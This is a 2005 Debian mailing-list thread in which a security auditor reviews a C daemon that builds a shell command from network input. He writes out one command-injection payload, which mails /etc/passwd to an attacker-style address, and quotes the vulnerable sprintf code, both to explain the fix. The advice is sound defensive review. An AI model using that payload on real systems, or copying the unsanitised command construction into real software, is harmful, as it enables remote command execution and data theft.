Re: SOLVED: Daemon Programming

To: debian-testing@lists.debian.org, debian-user@lists.debian.org, debian-mentors@lists.debian.org
Subject: Re: SOLVED: Daemon Programming
From: Sergio Cuéllar Valdés <herrsergio@gmail.com>
Date: Thu, 13 Jan 2005 22:14:34 -0600
Message-id: <[🔎] 7663371b050113201423e47a5f@mail.gmail.com>
Reply-to: Sergio Cuéllar Valdés <herrsergio@gmail.com>
In-reply-to: <[🔎] 20050114035843.GA13377@steve.org.uk>
References: <[🔎] 7663371b050113124368650253@mail.gmail.com> <87acrcsp9k.fsf@aptiva.optonline.net> <[🔎] 7663371b0501131931a2c2e6e@mail.gmail.com> <[🔎] 7663371b050113194128053a47@mail.gmail.com> <[🔎] 20050114035843.GA13377@steve.org.uk>

Yep, thats a good point, that I havent realized. The security stuff is
very very important.

I have to change the code to be able to manage this problems. This is
the next step.

Thanks for your advice ;-)

Sergio Cuellar Valdes


On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <skx@debian.org> wrote:
> On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote:
> > Marc, thanks that was the problem !!!
> >
> > sprintf(message, "say -s 4 -a \"%s\"", buffer);  < this was the big
> > big big mistake
> 
>   It certainly was.
> 
> > I added the hole path to the instructions:
> >
> > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> >
> > Thanks to all of you who helped me !!  :-)
> 
>   You deamonize.  You open a socket.  You read input from that
>  socket - carefully avoiding buffer overflows - then you run the
>  command:
> 
>   /usr/local/bin/say -s 4 -a "the text you read"
> 
>   Firstly you don't avoid a simple buffer overflow.  Although
>  you have two buffers, 'buffer' for receiving the message from
>  the network and 'message' for running the command are both the
>  same size you don't account for the extra characters when you're
>  copying:
> 
> sprintf(message, "say -s 4 -a \"%s\"", buffer);
> 
>   At least change that to:
> 
> snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer);
> 
>   Secondly, and this is the biggie, you don't quote or process the
>  characters which are read from the network.
> 
>   Consider what would happen if a malicious user sent this:
> 
> "; cat /etc/passwd | mail l33thack0r@hotmail.com ; echo "
> 
>   You would run this commend:
> 
> /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
> 
>   Effectively you're allowing any user who can connect to your server
>  to execute arbitary commands.  If this is started by init you're likely
>  running as root too.
> 
>   Check that the characters you read from the network are only
>  [a-zA-Z ] and you're probably OK.
> 
> Steve
> --
> # The Debian Security Audit Project.
> http://www.debian.org/security/audit
> 
> 


-- 
"Meine Hoffnung soll mich leiten
Durch die Tage ohne Dich
Und die Liebe soll mich tragen
Wenn der Schmerz die Hoffnung bricht"

Reply to:

References:
- Daemon Programming
  - From: "Sergio Cuéllar" <herrsergio@gmail.com>
- Re: Daemon Programming
  - From: Sergio Cuéllar Valdés <herrsergio@gmail.com>
- Re: SOLVED: Daemon Programming
  - From: Sergio Cuéllar Valdés <herrsergio@gmail.com>
- Re: SOLVED: Daemon Programming
  - From: Steve Kemp <skx@debian.org>

Prev by Date: Re: Building linux-wlan-ng
Next by Date: Re: SOLVED: Daemon Programming
Previous by thread: Re: SOLVED: Daemon Programming
Next by thread: Re: SOLVED: Daemon Programming
Index(es):
- Date
- Thread